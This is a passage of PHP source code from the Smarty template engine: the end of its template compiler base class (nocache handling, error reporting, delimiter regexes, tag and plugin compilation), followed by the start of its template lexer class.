     *
     * @return string
     */
    public function appendCode($left, $right)
    {
        if (preg_match('/\s*\?>\s?$/D', $left) && preg_match('/^<\?php\s+/', $right)) {
            $left = preg_replace('/\s*\?>\s?$/D', "\n", $left);
            $left .= preg_replace('/^<\?php\s+/', '', $right);
        } else {
            $left .= $right;
        }
        return $left;
    }

    /**
     * Inject inline code for nocache template sections
     * This method gets the content of each template element from the parser.
     * If the content is compiled code and it should be not cached the code is injected
     * into the rendered output.
     *
     * @param string  $content content of template element
     * @param boolean $is_code true if content is compiled code
     *
     * @return string  content
     */
    public function processNocacheCode($content, $is_code)
    {
        // If the template is not evaluated and we have a nocache section and or a nocache tag
        if ($is_code && !empty($content)) {
            // generate replacement code
            if ((!($this->template->source->handler->recompiled) || $this->forceNocache) && $this->caching
                && !$this->suppressNocacheProcessing && ($this->nocache || $this->tag_nocache)
            ) {
                $this->template->compiled->has_nocache_code = true;
                $_output = addcslashes($content, '\'\\');
                $_output = str_replace('^#^', '\'', $_output);
                $_output =
                    "<?php echo '/*%%SmartyNocache:{$this->nocache_hash}%%*/{$_output}/*/%%SmartyNocache:{$this->nocache_hash}%%*/';?>\n";
                // make sure we include modifier plugins for nocache code
                foreach ($this->modifier_plugins as $plugin_name => $dummy) {
                    if (isset($this->required_plugins[ 'compiled' ][ $plugin_name ][ 'modifier' ])) {
                        $this->required_plugins[ 'nocache' ][ $plugin_name ][ 'modifier' ] =
                            $this->required_plugins[ 'compiled' ][ $plugin_name ][ 'modifier' ];
                    }
                }
            } else {
                $_output = $content;
            }
        } else {
            $_output = $content;
        }
        $this->modifier_plugins = array();
        $this->suppressNocacheProcessing = false;
        $this->tag_nocache = false;
        return $_output;
    }

    /**
     * Get Id
     *
     * @param string $input
     *
     * @return bool|string
     */
    public function getId($input)
    {
        if (preg_match('~^([\'"]*)([0-9]*[a-zA-Z_]\w*)\1$~', $input, $match)) {
            return $match[ 2 ];
        }
        return false;
    }

    /**
     * Get variable name from string
     *
     * @param string $input
     *
     * @return bool|string
     */
    public function getVariableName($input)
    {
        if (preg_match('~^[$]_smarty_tpl->tpl_vars\[[\'"]*([0-9]*[a-zA-Z_]\w*)[\'"]*\]->value$~', $input, $match)) {
            return $match[ 1 ];
        }
        return false;
    }

    /**
     * Set nocache flag in variable or create new variable
     *
     * @param string $varName
     */
    public function setNocacheInVariable($varName)
    {
        // create nocache var to make it know for further compiling
        if ($_var = $this->getId($varName)) {
            if (isset($this->template->tpl_vars[ $_var ])) {
                $this->template->tpl_vars[ $_var ] = clone $this->template->tpl_vars[ $_var ];
                $this->template->tpl_vars[ $_var ]->nocache = true;
            } else {
                $this->template->tpl_vars[ $_var ] = new Smarty_Variable(null, true);
            }
        }
    }

    /**
     * @param array $_attr tag attributes
     * @param array $validScopes
     *
     * @return int|string
     * @throws \SmartyCompilerException
     */
    public function convertScope($_attr, $validScopes)
    {
        $_scope = 0;
        if (isset($_attr[ 'scope' ])) {
            $_scopeName = trim($_attr[ 'scope' ], '\'"');
            if (is_numeric($_scopeName) && in_array($_scopeName, $validScopes)) {
                $_scope = $_scopeName;
            } elseif (is_string($_scopeName)) {
                $_scopeName = trim($_scopeName, '\'"');
                $_scope = isset($validScopes[ $_scopeName ]) ? $validScopes[ $_scopeName ] : false;
            } else {
                $_scope = false;
            }
            if ($_scope === false) {
                $err = var_export($_scopeName, true);
                $this->trigger_template_error("illegal value '{$err}' for \"scope\" attribute", null, true);
            }
        }
        return $_scope;
    }

    /**
     * Generate nocache code string
     *
     * @param string $code PHP code
     *
     * @return string
     */
    public function makeNocacheCode($code)
    {
        return "echo '/*%%SmartyNocache:{$this->nocache_hash}%%*/<?php " .
               str_replace('^#^', '\'', addcslashes($code, '\'\\')) .
               "?>/*/%%SmartyNocache:{$this->nocache_hash}%%*/';\n";
    }

    /**
     * display compiler error messages without dying
     * If parameter $args is empty it is a parser detected syntax error.
     * In this case the parser is called to obtain information about expected tokens.
     * If parameter $args contains a string this is used as error message
     *
     * @param string    $args    individual error message or null
     * @param string    $line    line-number
     * @param null|bool $tagline if true the line number of last tag
     *
     * @throws \SmartyCompilerException when an unexpected token is found
     */
    public function trigger_template_error($args = null, $line = null, $tagline = null)
    {
        $lex = $this->parser->lex;
        if ($tagline === true) {
            // get line number of Tag
            $line = $lex->taglineno;
        } elseif (!isset($line)) {
            // get template source line which has error
            $line = $lex->line;
        } else {
            $line = (int)$line;
        }
        if (in_array(
            $this->template->source->type,
            array(
                'eval',
                'string'
            )
        )
        ) {
            $templateName = $this->template->source->type . ':' . trim(
                    preg_replace(
                        '![\t\r\n]+!',
                        ' ',
                        strlen($lex->data) > 40 ?
                            substr($lex->data, 0, 40) .
                            '...' : $lex->data
                    )
                );
        } else {
            $templateName = $this->template->source->type . ':' . $this->template->source->filepath;
        }
        //        $line += $this->trace_line_offset;
        $match = preg_split("/\n/", $lex->data);
        $error_text =
            'Syntax error in template "' . (empty($this->trace_filepath) ? $templateName : $this->trace_filepath) .
            '"  on line ' . ($line + $this->trace_line_offset) . ' "' .
            trim(preg_replace('![\t\r\n]+!', ' ', $match[ $line - 1 ])) . '" ';
        if (isset($args)) {
            // individual error message
            $error_text .= $args;
        } else {
            $expect = array();
            // expected token from parser
            $error_text .= ' - Unexpected "' . $lex->value . '"';
            if (count($this->parser->yy_get_expected_tokens($this->parser->yymajor)) <= 4) {
                foreach ($this->parser->yy_get_expected_tokens($this->parser->yymajor) as $token) {
                    $exp_token = $this->parser->yyTokenName[ $token ];
                    if (isset($lex->smarty_token_names[ $exp_token ])) {
                        // token type from lexer
                        $expect[] = '"' . $lex->smarty_token_names[ $exp_token ] . '"';
                    } else {
                        // otherwise internal token name
                        $expect[] = $this->parser->yyTokenName[ $token ];
                    }
                }
                $error_text .= ', expected one of: ' . implode(' , ', $expect);
            }
        }
        if ($this->smarty->_parserdebug) {
            $this->parser->errorRunDown();
            echo ob_get_clean();
            flush();
        }
        $e = new SmartyCompilerException(
            $error_text,
            0,
            $this->template->source->filepath,
            $line
        );
        $e->source = trim(preg_replace('![\t\r\n]+!', ' ', $match[ $line - 1 ]));
        $e->desc = $args;
        $e->template = $this->template->source->filepath;
        throw $e;
    }

    /**
     * Return var_export() value with all white spaces removed
     *
     * @param mixed $value
     *
     * @return string
     */
    public function getVarExport($value)
    {
        return preg_replace('/\s/', '', var_export($value, true));
    }

    /**
     *  enter double quoted string
     *  - save tag stack count
     */
    public function enterDoubleQuote()
    {
        array_push($this->_tag_stack_count, $this->getTagStackCount());
    }

    /**
     * Return tag stack count
     *
     * @return int
     */
    public function getTagStackCount()
    {
        return count($this->_tag_stack);
    }

    /**
     * @param $lexerPreg
     *
     * @return mixed
     */
    public function replaceDelimiter($lexerPreg)
    {
        return str_replace(
            array('SMARTYldel', 'SMARTYliteral', 'SMARTYrdel', 'SMARTYautoliteral', 'SMARTYal'),
            array(
                $this->ldelPreg, $this->literalPreg, $this->rdelPreg,
                $this->smarty->getAutoLiteral() ? '{1,}' : '{9}',
                $this->smarty->getAutoLiteral() ? '' : '\\s*'
            ),
            $lexerPreg
        );
    }

    /**
     * Build lexer regular expressions for left and right delimiter and user defined literals
     */
    public function initDelimiterPreg()
    {
        $ldel = $this->smarty->getLeftDelimiter();
        $this->ldelLength = strlen($ldel);
        $this->ldelPreg = '';
        foreach (str_split($ldel, 1) as $chr) {
            $this->ldelPreg .= '[' . preg_quote($chr,'/') . ']';
        }
        $rdel = $this->smarty->getRightDelimiter();
        $this->rdelLength = strlen($rdel);
        $this->rdelPreg = '';
        foreach (str_split($rdel, 1) as $chr) {
            $this->rdelPreg .= '[' . preg_quote($chr,'/') . ']';
        }
        $literals = $this->smarty->getLiterals();
        if (!empty($literals)) {
            foreach ($literals as $key => $literal) {
                $literalPreg = '';
                foreach (str_split($literal, 1) as $chr) {
                    $literalPreg .= '[' . preg_quote($chr,'/') . ']';
                }
                $literals[ $key ] = $literalPreg;
            }
            $this->literalPreg = '|' . implode('|', $literals);
        } else {
            $this->literalPreg = '';
        }
    }

    /**
     *  leave double quoted string
     *  - throw exception if block in string was not closed
     *
     * @throws \SmartyCompilerException
     */
    public function leaveDoubleQuote()
    {
        if (array_pop($this->_tag_stack_count) !== $this->getTagStackCount()) {
            $tag = $this->getOpenBlockTag();
            $this->trigger_template_error(
                "unclosed '{{$tag}}' in doubled quoted string",
                null,
                true
            );
        }
    }

    /**
     * Get left delimiter preg
     *
     * @return string
     */
    public function getLdelPreg()
    {
        return $this->ldelPreg;
    }

    /**
     * Get right delimiter preg
     *
     * @return string
     */
    public function getRdelPreg()
    {
        return $this->rdelPreg;
    }

    /**
     * Get length of left delimiter
     *
     * @return int
     */
    public function getLdelLength()
    {
        return $this->ldelLength;
    }

    /**
     * Get length of right delimiter
     *
     * @return int
     */
    public function getRdelLength()
    {
        return $this->rdelLength;
    }

    /**
     * Get name of current open block tag
     *
     * @return string|boolean
     */
    public function getOpenBlockTag()
    {
        $tagCount = $this->getTagStackCount();
        if ($tagCount) {
            return $this->_tag_stack[ $tagCount - 1 ][ 0 ];
        } else {
            return false;
        }
    }

    /**
     * Check if $value contains variable elements
     *
     * @param mixed $value
     *
     * @return bool|int
     */
    public function isVariable($value)
    {
        if (is_string($value)) {
            return preg_match('/[$(]/', $value);
        }
        if (is_bool($value) || is_numeric($value)) {
            return false;
        }
        if (is_array($value)) {
            foreach ($value as $k => $v) {
                if ($this->isVariable($k) || $this->isVariable($v)) {
                    return true;
                }
            }
            return false;
        }
        return false;
    }

    /**
     * Get new prefix variable name
     *
     * @return string
     */
    public function getNewPrefixVariable()
    {
        ++self::$prefixVariableNumber;
        return $this->getPrefixVariable();
    }

    /**
     * Get current prefix variable name
     *
     * @return string
     */
    public function getPrefixVariable()
    {
        return '$_prefixVariable' . self::$prefixVariableNumber;
    }

    /**
     * append  code to prefix buffer
     *
     * @param string $code
     */
    public function appendPrefixCode($code)
    {
        $this->prefix_code[] = $code;
    }

    /**
     * get prefix code string
     *
     * @return string
     */
    public function getPrefixCode()
    {
        $code = '';
        $prefixArray = array_merge($this->prefix_code, array_pop($this->prefixCodeStack));
        $this->prefixCodeStack[] = array();
        foreach ($prefixArray as $c) {
            $code = $this->appendCode($code, $c);
        }
        $this->prefix_code = array();
        return $code;
    }

    /**
     * Save current required plugins
     *
     * @param bool $init if true init required plugins
     */
    public function saveRequiredPlugins($init = false)
    {
        $this->required_plugins_stack[] = $this->required_plugins;
        if ($init) {
            $this->required_plugins = array('compiled' => array(), 'nocache' => array());
        }
    }

    /**
     * Restore required plugins
     */
    public function restoreRequiredPlugins()
    {
        $this->required_plugins = array_pop($this->required_plugins_stack);
    }

    /**
     * Compile code to call Smarty_Internal_Template::_checkPlugins()
     * for required plugins
     *
     * @return string
     */
    public function compileRequiredPlugins()
    {
        $code = $this->compileCheckPlugins($this->required_plugins[ 'compiled' ]);
        if ($this->caching && !empty($this->required_plugins[ 'nocache' ])) {
            $code .= $this->makeNocacheCode($this->compileCheckPlugins($this->required_plugins[ 'nocache' ]));
        }
        return $code;
    }

    /**
     * Compile code to call Smarty_Internal_Template::_checkPlugins
     *   - checks if plugin is callable require otherwise
     *
     * @param $requiredPlugins
     *
     * @return string
     */
    public function compileCheckPlugins($requiredPlugins)
    {
        if (!empty($requiredPlugins)) {
            $plugins = array();
            foreach ($requiredPlugins as $plugin) {
                foreach ($plugin as $data) {
                    $plugins[] = $data;
                }
            }
            return '$_smarty_tpl->_checkPlugins(' . $this->getVarExport($plugins) . ');' . "\n";
        } else {
            return '';
        }
    }

    /**
     * method to compile a Smarty template
     *
     * @param mixed $_content template source
     * @param bool  $isTemplateSource
     *
     * @return bool true if compiling succeeded, false if it failed
     */
    abstract protected function doCompile($_content, $isTemplateSource = false);

    public function cStyleComment($string) {
        return '/*' . str_replace('*/', '* /' , $string) . '*/';
    }

    /**
     * Compile Tag
     *
     * @param string $tag       tag name
     * @param array  $args      array with tag attributes
     * @param array  $parameter array with compilation parameter
     *
     * @throws SmartyCompilerException
     * @throws SmartyException
     * @return string compiled code
     */
    private function compileTag2($tag, $args, $parameter)
    {
        $plugin_type = '';
        // $args contains the attributes parsed and compiled by the lexer/parser
        // assume that tag does compile into code, but creates no HTML output
        $this->has_code = true;
        // log tag/attributes
        if (isset($this->smarty->_cache[ 'get_used_tags' ])) {
            $this->template->_cache[ 'used_tags' ][] = array(
                $tag,
                $args
            );
        }
        // check nocache option flag
        foreach ($args as $arg) {
            if (!is_array($arg)) {
                if ($arg === "'nocache'" || $arg === 'nocache') {
                    $this->tag_nocache = true;
                }
            } else {
                foreach ($arg as $k => $v) {
                    if (($k === "'nocache'" || $k === 'nocache') && (trim($v, "'\" ") === 'true')) {
                        $this->tag_nocache = true;
                    }
                }
            }
        }
        // compile the smarty tag (required compile classes to compile the tag are auto loaded)
        if (($_output = $this->callTagCompiler($tag, $args, $parameter)) === false) {
            if (isset($this->parent_compiler->tpl_function[ $tag ])
                || (isset($this->template->smarty->ext->_tplFunction)
                    && $this->template->smarty->ext->_tplFunction->getTplFunction($this->template, $tag) !== false)
            ) {
                // template defined by {template} tag
                $args[ '_attr' ][ 'name' ] = "'{$tag}'";
                $_output = $this->callTagCompiler('call', $args, $parameter);
            }
        }
        if ($_output !== false) {
            if ($_output !== true) {
                // did we get compiled code
                if ($this->has_code) {
                    // return compiled code
                    return $_output;
                }
            }
            // tag did not produce compiled code
            return null;
        } else {
            // map_named attributes
            if (isset($args[ '_attr' ])) {
                foreach ($args[ '_attr' ] as $key => $attribute) {
                    if (is_array($attribute)) {
                        $args = array_merge($args, $attribute);
                    }
                }
            }
            // not an internal compiler tag
            if (strlen($tag) < 6 || substr($tag, -5) !== 'close') {
                // check if tag is a registered object
                if (isset($this->smarty->registered_objects[ $tag ]) && isset($parameter[ 'object_method' ])) {
                    $method = $parameter[ 'object_method' ];
                    if (!in_array($method, $this->smarty->registered_objects[ $tag ][ 3 ])
                        && (empty($this->smarty->registered_objects[ $tag ][ 1 ])
                            || in_array($method, $this->smarty->registered_objects[ $tag ][ 1 ]))
                    ) {
                        return $this->callTagCompiler('private_object_function', $args, $parameter, $tag, $method);
                    } elseif (in_array($method, $this->smarty->registered_objects[ $tag ][ 3 ])) {
                        return $this->callTagCompiler(
                            'private_object_block_function',
                            $args,
                            $parameter,
                            $tag,
                            $method
                        );
                    } else {
                        // throw exception
                        $this->trigger_template_error(
                            'not allowed method "' . $method . '" in registered object "' .
                            $tag . '"',
                            null,
                            true
                        );
                    }
                }
                // check if tag is registered
                foreach (array(
                    Smarty::PLUGIN_COMPILER,
                    Smarty::PLUGIN_FUNCTION,
                    Smarty::PLUGIN_BLOCK,
                ) as $plugin_type) {
                    if (isset($this->smarty->registered_plugins[ $plugin_type ][ $tag ])) {
                        // if compiler function plugin call it now
                        if ($plugin_type === Smarty::PLUGIN_COMPILER) {
                            $new_args = array();
                            foreach ($args as $key => $mixed) {
                                if (is_array($mixed)) {
                                    $new_args = array_merge($new_args, $mixed);
                                } else {
                                    $new_args[ $key ] = $mixed;
                                }
                            }
                            if (!$this->smarty->registered_plugins[ $plugin_type ][ $tag ][ 1 ]) {
                                $this->tag_nocache = true;
                            }
                            return call_user_func_array(
                                $this->smarty->registered_plugins[ $plugin_type ][ $tag ][ 0 ],
                                array(
                                    $new_args,
                                    $this
                                )
                            );
                        }
                        // compile registered function or block function
                        if ($plugin_type === Smarty::PLUGIN_FUNCTION || $plugin_type === Smarty::PLUGIN_BLOCK) {
                            return $this->callTagCompiler(
                                'private_registered_' . $plugin_type,
                                $args,
                                $parameter,
                                $tag
                            );
                        }
                    }
                }
                // check plugins from plugins folder
                foreach ($this->plugin_search_order as $plugin_type) {
                    if ($plugin_type === Smarty::PLUGIN_COMPILER
                        && $this->smarty->loadPlugin('smarty_compiler_' . $tag)
                        && (!isset($this->smarty->security_policy)
                            || $this->smarty->security_policy->isTrustedTag($tag, $this))
                    ) {
                        $plugin = 'smarty_compiler_' . $tag;
                        if (is_callable($plugin)) {
                            // convert arguments format for old compiler plugins
                            $new_args = array();
                            foreach ($args as $key => $mixed) {
                                if (is_array($mixed)) {
                                    $new_args = array_merge($new_args, $mixed);
                                } else {
                                    $new_args[ $key ] = $mixed;
                                }
                            }
                            return $plugin($new_args, $this->smarty);
                        }
                        if (class_exists($plugin, false)) {
                            $plugin_object = new $plugin;
                            if (method_exists($plugin_object, 'compile')) {
                                return $plugin_object->compile($args, $this);
                            }
                        }
                        throw new SmartyException("Plugin '{$tag}' not callable");
                    } else {
                        if ($function = $this->getPlugin($tag, $plugin_type)) {
                            if (!isset($this->smarty->security_policy)
                                || $this->smarty->security_policy->isTrustedTag($tag, $this)
                            ) {
                                return $this->callTagCompiler(
                                    'private_' . $plugin_type . '_plugin',
                                    $args,
                                    $parameter,
                                    $tag,
                                    $function
                                );
                            }
                        }
                    }
                }
                if (is_callable($this->smarty->default_plugin_handler_func)) {
                    $found = false;
                    // look for already resolved tags
                    foreach ($this->plugin_search_order as $plugin_type) {
                        if (isset($this->default_handler_plugins[ $plugin_type ][ $tag ])) {
                            $found = true;
                            break;
                        }
                    }
                    if (!$found) {
                        // call default handler
                        foreach ($this->plugin_search_order as $plugin_type) {
                            if ($this->getPluginFromDefaultHandler($tag, $plugin_type)) {
                                $found = true;
                                break;
                            }
                        }
                    }
                    if ($found) {
                        // if compiler function plugin call it now
                        if ($plugin_type === Smarty::PLUGIN_COMPILER) {
                            $new_args = array();
                            foreach ($args as $key => $mixed) {
                                if (is_array($mixed)) {
                                    $new_args = array_merge($new_args, $mixed);
                                } else {
                                    $new_args[ $key ] = $mixed;
                                }
                            }
                            return call_user_func_array(
                                $this->default_handler_plugins[ $plugin_type ][ $tag ][ 0 ],
                                array(
                                    $new_args,
                                    $this
                                )
                            );
                        } else {
                            return $this->callTagCompiler(
                                'private_registered_' . $plugin_type,
                                $args,
                                $parameter,
                                $tag
                            );
                        }
                    }
                }
            } else {
                // compile closing tag of block function
                $base_tag = substr($tag, 0, -5);
                // check if closing tag is a registered object
                if (isset($this->smarty->registered_objects[ $base_tag ]) && isset($parameter[ 'object_method' ])) {
                    $method = $parameter[ 'object_method' ];
                    if (in_array($method, $this->smarty->registered_objects[ $base_tag ][ 3 ])) {
                        return $this->callTagCompiler(
                            'private_object_block_function',
                            $args,
                            $parameter,
                            $tag,
                            $method
                        );
                    } else {
                        // throw exception
                        $this->trigger_template_error(
                            'not allowed closing tag method "' . $method .
                            '" in registered object "' . $base_tag . '"',
                            null,
                            true
                        );
                    }
                }
                // registered block tag ?
                if (isset($this->smarty->registered_plugins[ Smarty::PLUGIN_BLOCK ][ $base_tag ])
                    || isset($this->default_handler_plugins[ Smarty::PLUGIN_BLOCK ][ $base_tag ])
                ) {
                    return $this->callTagCompiler('private_registered_block', $args, $parameter, $tag);
                }
                // registered function tag ?
                if (isset($this->smarty->registered_plugins[ Smarty::PLUGIN_FUNCTION ][ $tag ])) {
                    return $this->callTagCompiler('private_registered_function', $args, $parameter, $tag);
                }
                // block plugin?
                if ($function = $this->getPlugin($base_tag, Smarty::PLUGIN_BLOCK)) {
                    return $this->callTagCompiler('private_block_plugin', $args, $parameter, $tag, $function);
                }
                // function plugin?
                if ($function = $this->getPlugin($tag, Smarty::PLUGIN_FUNCTION)) {
                    if (!isset($this->smarty->security_policy)
                        || $this->smarty->security_policy->isTrustedTag($tag, $this)
                    ) {
                        return $this->callTagCompiler('private_function_plugin', $args, $parameter, $tag, $function);
                    }
                }
                // registered compiler plugin ?
                if (isset($this->smarty->registered_plugins[ Smarty::PLUGIN_COMPILER ][ $tag ])) {
                    // if compiler function plugin call it now
                    $args = array();
                    if (!$this->smarty->registered_plugins[ Smarty::PLUGIN_COMPILER ][ $tag ][ 1 ]) {
                        $this->tag_nocache = true;
                    }
                    return call_user_func_array(
                        $this->smarty->registered_plugins[ Smarty::PLUGIN_COMPILER ][ $tag ][ 0 ],
                        array(
                            $args,
                            $this
                        )
                    );
                }
                if ($this->smarty->loadPlugin('smarty_compiler_' . $tag)) {
                    $plugin = 'smarty_compiler_' . $tag;
                    if (is_callable($plugin)) {
                        return $plugin($args, $this->smarty);
                    }
                    if (class_exists($plugin, false)) {
                        $plugin_object = new $plugin;
                        if (method_exists($plugin_object, 'compile')) {
                            return $plugin_object->compile($args, $this);
                        }
                    }
                    throw new SmartyException("Plugin '{$tag}' not callable");
                }
            }
            $this->trigger_template_error("unknown tag '{$tag}'", null, true);
        }
    }
}
<?php
/*
 * This file is part of Smarty.
 *
 * (c) 2015 Uwe Tews
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

/**
 * Smarty_Internal_Templatelexer
 * This is the template file lexer.
 * It is generated from the smarty_internal_templatelexer.plex file
 *
 *
 * @author Uwe Tews <uwe.tews@googlemail.com>
 */
class Smarty_Internal_Templatelexer
{
    /**
     * Source
     *
     * @var string
     */
    public $data;

    /**
     * Source length
     *
     * @var int
     */
    public $dataLength = null;

    /**
     * byte counter
     *
     * @var int
     */
    public $counter;

    /**
     * token number
     *
     * @var int
     */
    public $token;

    /**
     * token value
     *
     * @var string
     */
    public $value;

    /**
     * current line
     *
     * @var int
     */
    public $line;

    /**
     * tag start line
     *
     * @var
     */
    public $taglineno;

    /**
     * php code type
     *
     * @var string
     */
    public $phpType = '';

   /**
     * state number
     *
     * @var int
     */
    public $state = 1;

    /**
     * Smarty object
     *
     * @var Smarty
     */
    public $smarty = null;

    /**
     * compiler object
     *
     * @var Smarty_Internal_TemplateCompilerBase
     */
    public $compiler = null;

    /**
     * trace file
     *
     * @var resource
     */
    public $yyTraceFILE;

    /**
     * trace prompt
     *
     * @var string
     */
    public $yyTracePrompt;

    /**
     * XML flag true while processing xml
     *
     * @var bool
     */
    public $is_xml = false;

    /**
     * state names
     *
     * @var array
     */
    public $state_name = array(1 => 'TEXT', 2 => 'TAG', 3 => 'TAGBODY', 4 => 'LITERAL', 5 => 'DOUBLEQUOTEDSTRING',);

    /**
     * token names
     *
     * @var array
     */
    public $smarty_token_names = array(        // Text for parser error messages
                                               'NOT'         => '(!,not)',
                                               'OPENP'       => '(',
                                               'CLOSEP'      => ')',
                                               'OPENB'       => '[',
                                               'CLOSEB'      => ']',
                                               'PTR'         => '->',
                                               'APTR'        => '=>',
                                               'EQUAL'       => '=',
                                               'NUMBER'      => 'number',
                                               'UNIMATH'     => '+" , "-',
                                               'MATH'        => '*" , "/" , "%',
                                               'INCDEC'      => '++" , "--',
                                               'SPACE'       => ' ',
                                               'DOLLAR'      => '$',
                                               'SEMICOLON'   => ';',
                                               'COLON'       => ':',
                                               'DOUBLECOLON' => '::',
                                               'AT'          => '@',
                                               'HATCH'       => '#',
                                               'QUOTE'       => '"',
                                               'BACKTICK'    => '`',
                                               'VERT'        => '"|" modifier',
                                               'DOT'         => '.',
                                               'COMMA'       => '","',
                                               'QMARK'       => '"?"',
                                               'ID'          => 'id, name',
                                               'TEXT'        => 'text',
                                               'LDELSLASH'   => '{/..} closing tag',
                                               'LDEL'        => '{...} Smarty tag',
                                               'COMMENT'     => 'comment',
                                               'AS'          => 'as',
                                               'TO'          => 'to',
                                               'PHP'         => '"<?php", "<%", "{php}" tag',
                                               'LOGOP'       => '"<", "==" ... logical operator',
                                               'TLOGOP'      => '"lt", "eq" ... logical operator; "is div by" ... if condition',
                                               'SCOND'       => '"is even" ... if condition',
    );

    /**
     * literal tag nesting level
     *
     * @var int
     */
    private $literal_cnt = 0;

    /**
     * preg token pattern for state TEXT
     *
     * @var string
     */
    private $yy_global_pattern1 = null;

    /**
     * preg token pattern for state TAG
     *
     * @var string
     */
    private $yy_global_pattern2 = null;

    /**
     * preg token pattern for state TAGBODY
     *
     * @var string
     */
    private $yy_global_pattern3 = null;

    /**
     * preg token pattern for state LITERAL
     *
     * @var string
     */
    private $yy_global_pattern4 = null;

    /**
     * preg token pattern for state DOUBLEQUOTEDSTRING
     *
     * @var null
     */
    private $yy_global_pattern5 = null;

    /**
     * preg token pattern for text
     *
     * @var null
     */
    private $yy_global_text = null;

    /**
     * preg token pattern for literal
     *
     * @var null
     */
    private $yy_global_literal = null;

    /**
     * constructor
     *
     * @param   string                             $source template source
     * @param Smarty_Internal_TemplateCompilerBase $compiler
     */
    public function __construct($source, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        $this->data = $source;
        $this->dataLength = strlen($this->data);
        $this->counter = 0;
        if (preg_match('/^\xEF\xBB\xBF/i', $this->data, $match)) {
            $this->counter += strlen($match[0]);
        }
        $this->line = 1;
        $this->smarty = $compiler->template->smarty;
        $this->compiler = $compiler;
        $this->compiler->initDelimiterPreg();
        $this->smarty_token_names['LDEL'] = $this->smarty->getLeftDelimiter();
        $this->smarty_token_names['RDEL'] = $this->smarty->getRightDelimiter();
    }

    /**
     * open lexer/parser trace file
     *
     */
    public function PrintTrace()
    {
        $this->yyTraceFILE = fopen('php://output', 'w');
        $this->yyTracePrompt = '<br>';
    }

   /**
     * replace placeholders with runtime preg  code
     *
     * @param string $preg
     *
     * @return string
     */
   public function replace($preg)
   {
        return $this->compiler->replaceDelimiter($preg);
   }

    /**
     * check if current value is an autoliteral left delimiter
     *
     * @return bool
     */
    public function isAutoLiteral()
    {
        return $this->smarty->getAutoLiteral() && isset($this->value[ $this->compiler->getLdelLength() ]) ?
            strpos(" \n\t\r", $this->value[ $this->compiler->getLdelLength() ]) !== false : false;
    }

     
    private $_yy_state = 1;
    private $_yy_stack = array();

    public function yylex()
    {
        return $this->{'yylex' . $this->_yy_state}();
    }

    public function yypushstate($state)
    {
        if ($this->yyTraceFILE) {
             fprintf($this->yyTraceFILE, "%sState push %s\n", $this->yyTracePrompt, isset($this->state_name[$this->_yy_state]) ? $this->state_name[$this->_yy_state] : $this->_yy_state);
        }
        array_push($this->_yy_stack, $this->_yy_state);
        $this->_yy_state = $state;
        if ($this->yyTraceFILE) {
             fprintf($this->yyTraceFILE, "%snew State %s\n", $this->yyTracePrompt, isset($this->state_name[$this->_yy_state]) ? $this->state_name[$this->_yy_state] : $this->_yy_state);
        }
    }

    public function yypopstate()
    {
       if ($this->yyTraceFILE) {
             fprintf($this->yyTraceFILE, "%sState pop %s\n", $this->yyTracePrompt,  isset($this->state_name[$this->_yy_state]) ? $this->state_name[$this->_yy_state] : $this->_yy_state);
        }
       $this->_yy_state = array_pop($this->_yy_stack);
        if ($this->yyTraceFILE) {
             fprintf($this->yyTraceFILE, "%snew State %s\n", $this->yyTracePrompt, isset($this->state_name[$this->_yy_state]) ? $this->state_name[$this->_yy_state] : $this->_yy_state);
        }

    }

    public function yybegin($state)
    {
       $this->_yy_state = $state;
        if ($this->yyTraceFILE) {
             fprintf($this->yyTraceFILE, "%sState set %s\n", $this->yyTracePrompt, isset($this->state_name[$this->_yy_state]) ? $this->state_name[$this->_yy_state] : $this->_yy_state);
        }
    }


     
    public function yylex1()
    {
        if (!isset($this->yy_global_pattern1)) {
            $this->yy_global_pattern1 = $this->replace("/\G([{][}])|\G((SMARTYldel)SMARTYal[*])|\G((SMARTYldel)SMARTYautoliteral\\s+SMARTYliteral)|\G((SMARTYldel)SMARTYalliteral\\s*SMARTYrdel)|\G((SMARTYldel)SMARTYal[\/]literal\\s*SMARTYrdel)|\G((SMARTYldel)SMARTYal)|\G([\S\s])/isS");
        }
        if (!isset($this->dataLength)) {
            $this->dataLength = strlen($this->data);
        }
        if ($this->counter >=  $this->dataLength) {
            return false; // end of input
        }
        
        do {
            if (preg_match($this->yy_global_pattern1,$this->data, $yymatches, 0, $this->counter)) {
                if (!isset($yymatches[ 0 ][1])) {
                   $yymatches = preg_grep("/(.|\s)+/", $yymatches);
                } else {
                    $yymatches = array_filter($yymatches);
                }
                if (empty($yymatches)) {
                    throw new Exception('Error: lexing failed because a rule matched' .
                        ' an empty string.  Input "' . substr($this->data,
                        $this->counter, 5) . '... state TEXT');
                }
                next($yymatches); // skip global match
                $this->token = key($yymatches); // token number
                $this->value = current($yymatches); // token value
                $r = $this->{'yy_r1_' . $this->token}();
                if ($r === null) {
                    $this->counter += strlen($this->value);
                    $this->line += substr_count($this->value, "\n");
                    // accept this token
                    return true;
                } elseif ($r === true) {
                    // we have changed state
                    // process this token in the new state
                    return $this->yylex();
                } elseif ($r === false) {
                    $this->counter += strlen($this->value);
                    $this->line += substr_count($this->value, "\n");
                    if ($this->counter >=  $this->dataLength) {
                        return false; // end of input
                    }
                    // skip this token
                    continue;
                }            } else {
                throw new Exception('Unexpected input at line' . $this->line .
                    ': ' . $this->data[$this->counter]);
            }
            break;
        } while (true);

    } // end function


    const TEXT = 1;
    public function yy_r1_1()
    {

        $this->token = Smarty_Internal_Templateparser::TP_TEXT;
         }
    public function yy_r1_2()
    {

       $to = $this->dataLength;
       preg_match("/[*]{$this->compiler->getRdelPreg()}[\n]?/",$this->data,$match,PREG_OFFSET_CAPTURE,$this->counter);
        if (isset($match[0][1])) {
            $to = $match[0][1] + strlen($match[0][0]);
        } else {
            $this->compiler->trigger_template_error ("missing or misspelled comment closing tag '{$this->smarty->getRightDelimiter()}'");
        }
        $this->value = substr($this->data,$this->counter,$to-$this->counter);
        return false;
         }
    public function yy_r1_4()
    {

        $this->token = Smarty_Internal_Templateparser::TP_TEXT;
         }
    public function yy_r1_6()
    {

        $this->token = Smarty_Internal_Templateparser::TP_LITERALSTART;
        $this->yypushstate(self::LITERAL);
         }
    public function yy_r1_8()
    {

        $this->token = Smarty_Internal_Templateparser::TP_LITERALEND;
        $this->yypushstate(self::LITERAL);
         }
    public function yy_r1_10()
    {

        $this->yypushstate(self::TAG);
        return true;
         }
    public function yy_r1_12()
    {

       if (!isset($this->yy_global_text)) {
           $this->yy_global_text = $this->replace('/(SMARTYldel)SMARTYal/isS');
       }
       $to = $this->dataLength;
